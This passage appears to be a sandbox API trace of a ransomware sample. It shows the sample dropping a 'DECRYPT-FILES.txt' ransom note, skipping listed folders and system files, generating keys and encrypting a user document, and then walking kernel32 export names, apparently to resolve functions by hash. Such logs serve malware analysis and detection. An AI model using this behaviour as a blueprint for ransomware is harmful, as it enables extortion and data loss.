lpSrch="\\Games\\") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\All Users") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="AhnLab") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.479] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0077.479] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.479] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\\\jkbimi8.tmp") returned 101 [0077.479] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0077.481] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0077.481] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.481] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\\\DECRYPT-FILES.txt") returned 107 [0077.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0077.481] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0077.489] CloseHandle (hObject=0x45c) returned 1 [0077.490] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0077.490] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*" [0077.490] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0077.490] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.490] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.490] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.490] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.490] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4e2b7e00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x3fe4ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0077.490] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="DECRYPT-FILES.txt") returned -1 [0077.490] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="autorun.inf") returned 1 [0077.490] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="boot.ini") returned 1 [0077.490] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="desktop.ini") returned -1 [0077.490] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ntuser.dat") returned -1 [0077.490] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="iconcache.db") returned -1 [0077.490] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="bootsect.bak") returned 1 [0077.490] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="ntuser.dat.log") returned -1 [0077.490] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="thumbs.db") returned -1 [0077.490] lstrcmpiW (lpString1="Built-In Building Blocks.dotx", lpString2="Bootfont.bin") returned 1 [0077.490] lstrlenW (lpString="Built-In Building Blocks.dotx") returned 29 [0077.490] lstrcmpiW (lpString1="dotx", lpString2="lnk") returned -1 [0077.490] lstrcmpiW (lpString1="dotx", lpString2="exe") returned -1 [0077.490] lstrcmpiW (lpString1="dotx", lpString2="sys") returned -1 [0077.490] lstrcmpiW (lpString1="dotx", lpString2="dll") returned 1 [0077.490] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned 89 [0077.490] lstrlenW (lpString="Built-In Building Blocks.dotx") returned 29 [0077.491] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" [0077.491] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpString2="Built-In Building Blocks.dotx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" [0077.491] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.491] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0077.492] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=4187307) returned 1 [0077.492] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0077.492] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4110000 [0077.495] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.495] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.495] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.497] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0077.497] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.693] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.693] WriteFile (in: hFile=0x460, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0077.694] CloseHandle (hObject=0x0) returned 0 [0077.694] CloseHandle (hObject=0x460) returned 1 [0077.765] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.766] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.766] GetTickCount () returned 0x114bf1b [0077.766] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.766] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.766] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.767] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.767] lstrlenA (lpString="kernel32.dll") returned 12 [0077.767] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.767] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.767] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.767] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.767] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.767] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.767] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.767] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.767] lstrlenA (lpString="ADDATOMA") returned 8 [0077.767] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.767] lstrlenA (lpString="ADDATOMW") returned 8 [0077.767] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.767] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.767] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.767] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.767] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.767] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.767] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.768] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.768] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.768] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.768] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.768] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.768] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.768] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.768] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.768] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.768] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.768] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.768] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.768] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.768] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.768] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.768] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.768] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.768] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.768] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.768] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.769] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.769] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.769] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.769] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.769] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.769] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.769] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.769] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.769] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.769] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.769] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.769] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.769] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.769] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.769] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.769] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.769] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.769] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.769] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.770] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.770] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.770] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.770] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.770] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.770] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.770] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.770] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.770] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.770] lstrlenA (lpString="BEEP") returned 4 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.770] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.770] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.770] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.770] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.770] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.770] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.770] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.770] lstrlenA (lpString="CALLNAMEDPIPEA") 